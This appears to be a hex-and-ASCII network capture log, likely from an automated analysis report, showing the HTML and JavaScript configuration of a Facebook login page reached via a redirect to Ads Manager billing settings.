                                                                                                                                                                                    2023-01-05 08:01:40 UTC20152INData Raw: 64 30 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65
                                                                                                                                                                                    Data Ascii: d01b<!DOCTYPE html><html lang="en" id="face
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20152INData Raw: 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6a 39 4c 4d 73 75 59 70 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e
                                                                                                                                                                                    Data Ascii: book" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="j9LMsuYp">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["En
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20154INData Raw: 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c
                                                                                                                                                                                    Data Ascii: url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><l
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20155INData Raw: 68 3d 22 59 6f 32 55 7a 4f 68 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 57 2f 72 2f 4e 6b 4a 57 66 32 44 48 41 79 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 58 4e 61 4d 6e 32 2b 22 20 6e 6f 6e 63 65 3d 22 6a 39 4c 4d 73 75 59 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6a 39 4c 4d 73 75 59 70 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a
                                                                                                                                                                                    Data Ascii: h="Yo2UzOh" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/NkJWf2DHAyg.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="XNaMn2+" nonce="j9LMsuYp"></script><script nonce="j9LMsuYp">requireLazy(["HasteSupportData"],function(m){m.handle({"clpData":
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20156INData Raw: 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f
                                                                                                                                                                                    Data Ascii: e":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":"facebook.co
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20158INData Raw: 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a
                                                                                                                                                                                    Data Ascii: ,"USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_CALL_GUEST_USER":
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20159INData Raw: 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45 4b 4f 5f 44 49 53 41 42 4c 45 5f 43 52 45 41 54
                                                                                                                                                                                    Data Ascii: tformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREAT
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20161INData Raw: 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49 7a 6f 73 36 58 4a 58 22 2c 22 72 66 38 4a 45 50 47 67 4f 69 22 2c 22 34 6a 33 36 53 56 7a 76 50 33 77 22 2c 22 34 4e 53 71 33 5a 43 34 53
                                                                                                                                                                                    Data Ascii: "BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SVzvP3w","4NSq3ZC4S
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20162INData Raw: 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65 64 44 6f 6d 61 69 6e 73 22 2c 5b 5d 2c 7b 22 61 6c
                                                                                                                                                                                    Data Ascii: "InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"al
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20164INData Raw: 22 3a 7b 22 70 72 69 6d 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 2c 22 73 65 63 6f 6e 64 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 7d 2c 22 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d 2c 35 34 5d 2c 5b 22 53 65 73 73 69 6f 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 56 56 31 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f
                                                                                                                                                                                    Data Ascii: ":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["SessionNameConfig",[],{"seed":"2VV1"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsuppo
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20165INData Raw: 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 62 6c 69 74 65 5c 2f 63 6f 6e 66 69 67 5c 2f 22 3a 31 2c 22 5c 2f 68 72 5c 2f 7a 73 68 5c 2f 77 63 5c 2f 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 62 6f 6f 74 6c 6f 61 64 65 72 2d 65 6e 64 70 6f 69 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61 74 75 72 65 5f 73 77 69 74 63 68 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65
                                                                                                                                                                                    Data Ascii: hp":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20167INData Raw: 2f 22 3a 31 2c 22 5c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 5c 2f 6c 6f 67 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 66 31 32 33 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 73 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e
                                                                                                                                                                                    Data Ascii: /":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/con
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20168INData Raw: 62 61 63 6b 5f 66 72 6f 6d 5f 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 5f 66 6c 61 67 22 3a 33 7d 2c 35 32 33 37 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 56 63 45 4a 47 5f 51 65 43 34 33 37 79 6b 37 49 70 4c 56 2d 76 64 66 71 4a 74 70 6b 39 68 6c 6a 6a 38 67 72 50 34 2d 54 42 30 38 4f 73 64 37 49 56 50 79 33 6d 78 65 42 31 6e 77 2d 72 52 65 76 32 75 6a 47 6a 6f 39 53 6e 68 43 6f 39 78 4b 38 70 69 33 54 61 5a 69 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d
                                                                                                                                                                                    Data Ascii: back_from_immediate":false,"impression_experiment_flag":3},5237],["cr:696703",[],{"__rc":[null,"Aa2VcEJG_QeC437yk7IpLV-vdfqJtpk9hljj8grP4-TB08Osd7IVPy3mxeB1nw-rRev2ujGjo9SnhCo9xK8pi3TaZiI"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":["EventProfilerIm
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20170INData Raw: 30 38 4f 73 64 37 49 56 50 79 33 6d 78 65 42 31 6e 77 2d 72 52 65 76 32 75 6a 47 6a 6f 39 53 6e 68 43 6f 39 78 4b 38 70 69 33 54 61 5a 69 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 32 56 63 45 4a 47 5f 51 65 43 34 33 37 79 6b 37 49 70 4c 56 2d 76 64 66 71 4a 74 70 6b 39 68 6c 6a 6a 38 67 72 50 34 2d 54 42 30 38 4f 73 64 37 49 56 50 79 33 6d 78 65 42 31 6e 77 2d 72 52 65 76 32 75 6a 47 6a 6f 39 53 6e 68 43 6f 39 78 4b 38 70 69 33 54 61 5a 69 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34 22 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65
                                                                                                                                                                                    Data Ascii: 08Osd7IVPy3mxeB1nw-rRev2ujGjo9SnhCo9xK8pi3TaZiI"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa2VcEJG_QeC437yk7IpLV-vdfqJtpk9hljj8grP4-TB08Osd7IVPy3mxeB1nw-rRev2ujGjo9SnhCo9xK8pi3TaZiI"]},-1],["cr:729414",["VisualCompletion"],{"__rc":["VisualComple
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20171INData Raw: 38 38 76 4d 68 66 71 43 32 79 45 65 6c 4a 73 46 61 57 5f 42 59 53 6d 53 75 30 4f 4f 51 54 31 54 39 51 48 36 32 5a 77 56 6d 75 45 5a 5f 36 2d 77 45 71 6e 36 4b 71 63 58 35 79 37 53 5a 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 67 51 38 71 50 52 52 74 73 61 65 41 6c 55 5a 7a 47 6d 74 35 54 39 38 46 39 42 42 6f 41 4d 38 39 63 38 68 6a 4d 47 51 70 59 4f 38 69 6b 44 52 4e 78 38 6e 67 79 68 52 52 59 39 66 59 70 6c 6f 66 32 47 47 79 54 64 5a 46 35 54 67 5f 65 6b 77 73 61 4b 67 35 47 68 77 6e 37 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 6d 61 72 6b 4a 53 45 6e 61 62 6c 65 64 22 5d 2c 5b 22 6c 6f 77 65 72 44 6f 6d 61 69 6e 22 5d 2c 5b 22 55 52 4c 46 72 61
                                                                                                                                                                                    Data Ascii: 88vMhfqC2yEelJsFaW_BYSmSu0OOQT1T9QH62ZwVmuEZ_6-wEqn6KqcX5y7SZ"]},-1],["cr:1984081",[],{"__rc":[null,"Aa2gQ8qPRRtsaeAlUZzGmt5T98F9BBoAM89c8hjMGQpYO8ikDRNx8ngyhRRY9fYplof2GGyTdZF5Tg_ekwsaKg5Ghwn7"]},-1]],"require":[["markJSEnabled"],["lowerDomain"],["URLFra
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20173INData Raw: 74 20 6c 6f 67 20 69 6e 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 34 2d 75 32 20 5f 31 77 31 74 20 5f 34 2d 75 38 20 5f 35 32 6a 76 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 75 22 20 69 64 3d 22 68 65 61 64 65 72 5f 62 6c 6f 63 6b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 39 37 77 31 20 5f 35 30 66 36 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 61 78 7a 22 3e 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 20 61 63 74 69 6f 6e
                                                                                                                                                                                    Data Ascii: t log in to continue.</div></div></div><div class="_4-u2 _1w1t _4-u8 _52jv"><div class="_xku" id="header_block"><span class="_97w1 _50f6"><div class="_9axz">Log Into Facebook</div></span></div><div class="login_form_container"><form id="login_form" action
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20174INData Raw: 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 20 69 64 3d 22 65 6d 61 69 6c 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65 20 6e 75 6d 62 65 72 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 31 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d
                                                                                                                                                                                    Data Ascii: js" value="n" /><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Email or phone number" value="" autofocus="1" autocomplete=
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20176INData Raw: 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 66 69 72
                                                                                                                                                                                    Data Ascii: ce" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="fir
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20177INData Raw: 66 6f 6f 74 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 75 69 4c 69 73 74 20 6c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 4c 69 73 74 20 5f 32 70 69 64 20 5f 35 30 39 2d 20 5f 34 6b 69 20 5f 36 2d 68 20 5f 36 2d 6a 20 5f 36 2d 69 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 3c 6c 69 3e 45 6e 67 6c 69 73 68 20 28 55 53 29 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65
                                                                                                                                                                                    Data Ascii: footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_se
